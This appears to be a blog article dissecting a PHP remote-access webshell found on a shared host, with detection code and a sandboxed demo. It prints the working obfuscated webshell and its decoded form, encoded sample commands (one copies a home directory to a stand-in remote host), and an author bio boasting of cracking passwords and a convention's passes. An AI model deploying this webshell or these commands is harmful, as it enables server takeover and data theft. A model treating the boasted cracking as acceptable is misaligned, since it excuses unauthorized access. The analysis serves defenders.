Server Virus under Attack

This article studies in detail the anatomy of a server virus, its reverse assembly, method of attack, and how it can be disabled.

An account I manage for a startup has been hacked. This happens all the time, I’m sure; what was troubling to me is that the reaction of the tech support (ref.) was to change our password weekly, as if the FTP security was compromised. The whole server was compromised by a R.A.T. (Remote Access Tool), and changing all the customers’ passwords had little effect other than to annoy them and, in my case, trigger my curiosity and lead me to:

  1. Disassemble the Virus
  2. Make a mental note that that company’s technical support was incompetent enough for me to avoid, at all costs, doing business with them.

Architectural Foreword

As an architect, I surround myself with competent, dedicated and smart individuals who have the potential, if not the proven track record, of having solved difficult problems in their field. In short, I work with experts.

In my vision, an ISP who knows less than I do about servers, protocols, privacy and security might as well be a fly-by-night tainted operation: I respect scientists who know more in their field than I do. And since neither my formal academic training nor my area of expertise is in IT, all sorts of alarm bells rang when it took me less time to disassemble the Virus than for the Support Team to notify their users that their data was seriously compromised.

To prove my point, you will be guided at the end of this article to a hands-on exercise where you yourself get to try the virus, in the safety of this lab environment.

I now invite you to discover how I disarmed this malicious software, try it yourself, and find hints on how to look for possible infections.

The Anatomy of a Server Virus

1. Facts

  1. Your server, connected to the outside world, is constantly under attack.
  2. If your server is online, you are at risk.
  3. Viruses used to be silly malicious software that could damage your computer. Viruses are now clever malicious malware that will hurt you and others on a large scale.
  4. Knowledge is power. If you know what is coming your way, you may be able to deflect the attack.

2. Reality Check

  1. You (the honest website builder) only have the available tools to protect yourself. We will call that the shield. They (the malicious hackers) are well aware of the shields you use, their strength, limitations, pitfalls and even bugs. They constantly use smarter, more advanced, distributed technology. Yes, eventually, a better sword will pierce your shield.
  2. If you are the IT manager of a Fortune 500 company, bother reading this article not. You already know what I am talking about, and the funds you ditch yearly in security exceed my lifetime salary a few times over already. For the rest of us, who host our sites on one of the well-known providers, it is a different story. Infections cross user accounts and enter via ways against which we, the host customers, have no defense.
  3. Viruses plaguing servers have various intentions, generally stealing processor time, server’s bandwidth, server’s content, and, well, money.
  4. Know how to identify a server virus. This is what this article is about.

3. What’s a R.A.T.

R.A.T. stands for Remote Administration Tool.

A R.A.T. is a remotely controlled virus.

It is a virus that knows no account limit, no time limit, no power limit. It is an incredibly small file, with incredibly little intelligence. Let me compare 3 classes of viruses to clarify that statement:

  1. An old-school Trojan is malicious software which you would install yourself on your machine. It presents itself as a sheep, while it is a wolf. Once you run it, all hell breaks loose. Because you would install it yourself, a Trojan can be a rather large piece of software. You generally would know right away you are infected, only too late.
  2. A traditional Virus is a small piece of software which tucks itself inside another, otherwise harmless piece of software. Hence the name Virus, which implies infecting larger applications (and hiding there), self-replicating capabilities, and of course some malicious objective and often disastrous side effects.
  3. A R.A.T. is even smaller than a Virus. Think of it as an inert piece of DNA. It knows nothing, does nothing, can’t reproduce itself on its own. A R.A.T. by itself is harmless. Launch it and nothing happens. Delete it and no harm is done.

4. Why is a R.A.T. dangerous?

A R.A.T. gives total control, I repeat, total control of your computer (i.e. the server) to another computer, remotely. That remote computer may be located on Mars for all I know, and reproduce like rabbits, install new software, de-activate your virus protection software, delete files, snoop around, trace your activities, read all your information, etc.

Quick, think about something your server can do.
Yes, a R.A.T. can do that too. And using your account credentials while it’s at it.

5. Will a R.A.T. disable my computer?

Unlikely. The strength of a R.A.T. is its stealth mode of operation. Removing files, compromising your server’s mode of operation, or being discovered is probably the last thing a R.A.T. will do. That would be a suicidal R.A.T., but in order to disable a system on a large scale, this is entirely conceivable.

Few secret agents wear the official secret agent outfit (dark glasses, cool hat, long coat, and newspaper to hide behind). A R.A.T. is no exception.

6. Will a R.A.T. make unauthorized use of my server?

Likely. And others, too. It will send spam, trace transactions, and multiply discreetly. The more R.A.T. around, the harder to eradicate.

7. Can I protect myself against a R.A.T.?

If you host your own domain on your own system, possibly. This is beyond the scope of this article.

If you use an external host on a shared computer, this responsibility is shared between you and that host. Your responsibility is to keep your directories non writable when possible, and report suspect files, while the host’s responsibility is to take immediate action if an infection occurs.

Do not rely on that statement! The reason I am writing this article in the first place is that a national provider has been infected, and while we gave said host all information about the infection, their response was to change our FTP password, randomly, once a week.

Let me make that clear. Bleeding a patient rarely improves a fever.

8. What to do when infected?

  1. Rename the suspicious file right away. Do not delete it! If that file was not a R.A.T., you may permanently damage your own server! Renaming it will give you a chance to reactivate the offending file, if it was not a R.A.T. after all.
  2. Remove its executable permission. A native server R.A.T. will be executable by definition, so that may be a valid method. Know that this may not be enough.
  3. Move it to a different directory. Chances are the remote computer won’t find it, at least right away.
  4. ZIP it! A compressed R.A.T. (or Virus, or Trojan) is, by definition, disabled.
  5. Send that ZIP file to me for analysis! (dev@thegothicparty.com). Time permitting, we will look at it and suggest appropriate action.

I recommend renaming a potential R.A.T. and lowering its privileges as your first line of defense: this will prevent the remote controller from finding it, and if it does, prevent the file from being read and the script executed by an unauthorized user.

9. R.A.T. dissection

I will spare you the gory details. Here is a step-by-step analysis of the remote access tool that infected <name withheld> national provider mentioned above.

9.1. File specifics

  • Original virus name, as stored on the server:
    googlecalendar.php
    We had never installed googlecalendar in that well controlled environment, so the presence of that file was rather suspicious.
  • Original virus content, when opened with a text editor:
    <?php $X=basename(__FILE__); $l="aWYoJF9QT1NUWyJsaW5rIl0peyRzdW0
    9c3Vic3RyKCRfUE9TVFsibGluayJdLCBzdHJsZW4oJF9QT1NUWyJsaW5rIl0pLTQ
    sc3RybGVuKCRfUE9TVFsibGluayJdKS0xKTsgaWYoJHN1bT0iMWpYIil7JGxpbms
    9YmFzZTY0X2RlY29kZShzdWJzdHIoJF9QT1NUWyJsaW5rIl0sIDAsIHN0cmxlbig
    kX1BPU1RbImxpbmsiXSktNCkpOyBAc3lzdGVtKCRsaW5rKTt9fQ=="; eval(bas
    e64_decode($l)); ?>

9.2. aWYoJF9QT1N… etc. Plain English for the Reasonable Man.

Replacing the stream of 276 evidently obfuscated characters with “obfuscated”, and adding some formatting and some comments:

<?php                         // Execute the following PHP script
    $X=basename(__FILE__);    // Store where we're at into $X
    $l="obfuscated";          // Put some {magic} into $l
    eval(                     // execute the {magic}
        base64_decode($l)     // decode "obfuscated"
    );
?>

The eval command is the danger here. Replacing eval with echo and merely executing the PHP script transforms “obfuscated” into this dangerous algorithm:

if($_POST["link"]){$sum=substr($_POST["link"], strlen($_POST["li
nk"])-4,strlen($_POST["link"])-1); if($sum="1jX"){$link=base64_d
ecode(substr($_POST["link"], 0, strlen($_POST["link"])-4)); @sys
tem($link);}}

9.3. Here is the formatted source code…

Reverse-engineered by our good people at the lab, conveniently indented and commented, it turns out to be a well-written piece of code, which will execute without flaws. Dynamic commands can be generated remotely, executed by the R.A.T., and the results sent back to the originating organization.

if( $_POST["link"]) {  // Retrieve the link parameter. $_POST reads it
                       // from the body of a POST request, not from
                       // the URL query string. In this RAT:
                       // POST {yourserver}/googlecalendar.php
                       // with the body link={magic}
    $sum=substr( $_POST["link"],
                 strlen($_POST["link"])-4,
                 strlen($_POST["link"])-1);
                       // extract a signature from {magic}
                       // substr() starts 4 characters before the end,
                       // so this is the last 4 characters
    if( $sum="1jX") {
                       // Intended: if the signature matches, then
                       // decode it using MIME base64.
                       // Note that the hacker permanently hardcoded
                       // the signature as "1jX". Note also that the
                       // single = assigns instead of comparing, so
                       // this test is always true.
        $link=base64_decode( substr($_POST["link"],
                             0,
                             strlen($_POST["link"])-4));
                       // convert {magic} (minus the signature)
                       // into a command. There is no further
                       // verification that this command is valid.
        @system($link);
                       // use @ to suppress error, warnings and
                       // order the system to execute the command!
    }
}
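For incident response, the same parsing can be replayed offline to see which commands were sent to the script. The following is an added example, not part of the original article or of the R.A.T.: it assumes you hold captured urlencoded POST bodies (for instance from a WAF or audit log), and the function names and sample bodies are constructed for illustration.

```python
import base64
import re
from urllib.parse import parse_qs

SIGNATURE = "1jX"   # literal hardcoded in the script
SUFFIX_LEN = 4      # substr() starts at strlen-4: the last 4 characters

def decode_link(link: str) -> dict:
    """Recover the command carried by one captured 'link' value."""
    body, suffix = link[:-SUFFIX_LEN], link[-SUFFIX_LEN:]
    # PHP's non-strict base64_decode() discards characters outside the
    # alphabet and does not require padding, so normalise for Python.
    body = re.sub(r"[^A-Za-z0-9+/]", "", body)
    if len(body) % 4 == 1:          # one stray character cannot encode a byte
        body = body[:-1]
    body += "=" * (-len(body) % 4)
    command = base64.b64decode(body).decode("utf-8", "replace")
    # The script's `$sum="1jX"` assigns instead of comparing, so it runs the
    # command whatever the suffix is: report the suffix, do not filter on it.
    return {"command": command, "suffix": suffix,
            "suffix_is_signature": suffix.startswith(SIGNATURE)}

def decode_post_bodies(bodies):
    """Decode every 'link' field found in urlencoded POST bodies."""
    results = []
    for raw in bodies:
        for link in parse_qs(raw).get("link", []):
            results.append(decode_link(link))
    return results

# Constructed request bodies; the first two link values are taken from
# section 10.1 of this article, the third carries an arbitrary suffix.
SAMPLE_BODIES = [
    "link=bHMgLWFs1jx%3D",
    "link=c2NwIC1yIH4gdGhpZWZAc29tZS5sb2NhdGlvbi5vbi5tYXJz1jx%3D",
    "link=bHMgLWFsABCD",
]

if __name__ == "__main__":
    for hit in decode_post_bodies(SAMPLE_BODIES):
        print(hit)
```

Because the parameter travels in the POST body, a standard access log shows only a POST to the script, not the command itself.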

9.4. How to find this virus on your system?

Bother not looking for the filename. Instead, trust that this RAT decodes a previously base64-encoded string, so execute a grep as follows and inspect the result.
[~] grep -r "base64_decode" .
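A plain grep also reports every legitimate use of base64_decode, and the eval-to-echo step from 9.2 means running the suspect file. As an added example (not part of the original article), the sketch below decodes quoted base64 literals statically, without executing any PHP, and reports only those that hide a risky call. The function names, the list of risky calls and both samples are constructed for illustration, and it assumes each literal sits on a single line.

```python
import base64
import binascii
import re
from pathlib import Path

# Quoted runs of 24+ base64 characters in PHP source.
B64_LITERAL = re.compile(r"""["']([A-Za-z0-9+/]{24,}={0,2})["']""")
# Calls worth a look when they only become visible after decoding.
RISKY_CALL = re.compile(
    r"\b(eval|assert|system|exec|shell_exec|passthru|popen|proc_open)\s*\(")

def hidden_payloads(php_source: str):
    """Return (decoded_text, risky_calls) for each suspicious literal."""
    findings = []
    for match in B64_LITERAL.finditer(php_source):
        try:
            raw = base64.b64decode(match.group(1), validate=True)
        except (binascii.Error, ValueError):
            continue                      # not valid base64 after all
        text = raw.decode("utf-8", "replace")
        calls = sorted(set(RISKY_CALL.findall(text)))
        if calls:
            findings.append((text, calls))
    return findings

def scan_tree(root: str):
    """Map each .php file under root to its findings; clean files are omitted."""
    report = {}
    for path in Path(root).rglob("*.php"):
        found = hidden_payloads(path.read_text(errors="replace"))
        if found:
            report[str(path)] = found
    return report

# Constructed samples. INNER is a shortened stand-in for the decoded payload
# shown in 9.2; BENIGN is an ordinary use of base64_decode that plain grep
# would also report.
INNER = 'if($_POST["link"]){ @system($link); }'
DROPPER = ('<?php $l="' + base64.b64encode(INNER.encode()).decode()
           + '"; eval(base64_decode($l)); ?>')
BENIGN = ('<?php $png = base64_decode("'
          + base64.b64encode(b"\x89PNG\r\n\x1a\n" + bytes(16)).decode()
          + '"); ?>')

if __name__ == "__main__":
    print(hidden_payloads(DROPPER))
    print(hidden_payloads(BENIGN))
```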

R.A.T. – Dead.

10. Experiment with the R.A.T.

Disclaimer: The R.A.T. you are about to try is, well, in a coma. It will analyze the parameters you are sending, and stop short of executing the command. The result will be displayed in a new window. Neither you nor the server hosting thegothicparty.com is at risk.

10.1. Here are some R.A.T. commands ready to try:

  1. bHMgLWFs1jx=

    (List the content of the current directory)

  2. Y2htb2QgIHggZmlsZQ==1jx=

    (Make a file executable, so it can be run)

  3. c2NwIC1yIH4gdGhpZWZAc29tZS5sb2NhdGlvbi5vbi5tYXJz1jx=

    (Copy the entire user directory to a remote location)

10.2. Create your own R.A.T. commands and try them out!

Use this URL to create a Linux command, encode it in base64, add the password, and then feed the result to the R.A.T.!

  1. Substitute {your-command} with, well, your command: http://thegothicparty.com/dev/wp-content/extras/server-side-virus-rat/base64.php?raw={your-command}
  2. Now that you have an encoded command, use it to invoke the R.A.T.: http://thegothicparty.com/dev/wp-content/extras/server-side-virus-rat/rat.php?link={encoded-command}

If you succeed, you will get to a page that says “@system(do-something-horrible)”, which in the original RAT could have had disastrous effects. Good thing you are in the lab!

This makes you a hacker, I think…

About the Author

Xavier Schott has written shields and swords for as long as I have been developing software. In reverse order, here are some interesting swords:

  1. Cracked some authentication method used by <name withheld> convention, and came out with about 70 free passes overnight. Paid full price for the entry fee, then re-entered <name withheld> convention with one of the free codes, and proceeded to distribute my resume to security companies in order to land a job as a legal hacker, finding cracks in their system in order to improve it. Some simply kicked me out of their stand, some were both intimidated and scared, and no-one called me back.
  2. Cracked the user’s password for <name withheld> who had lost access to his online service information. Connected a computer to his network, made my computer act as a host (which his computer blindly trusted), led his software to think it was communicating with a distant server.
  3. Cracked the administrative password for <name withheld>, an accounting software, while the company’s accountant had been fired and was nowhere to be found. Created 2 new fresh installations of said software, with 2 carefully chosen sets of data, and diff’ed the two. The password was the name of his girlfriend, and the company that ordered the work never paid as promised.
  4. Cracked some other <name withheld> applications which are too sensitive to reveal here.

And here is a list of the most famous shields I wrote:

  1. <name withheld>
  2. <name withheld>
  3. etc.

References

  1. This article was originally published under the title How does a server-side virus work? (RAT) on http://thegothicparty.com/dev/article/server-side-virus-rat/

Xavier Schott

0010 0000 years of algorithm crafting, software architecture, and bringing visionary mobile apps to market.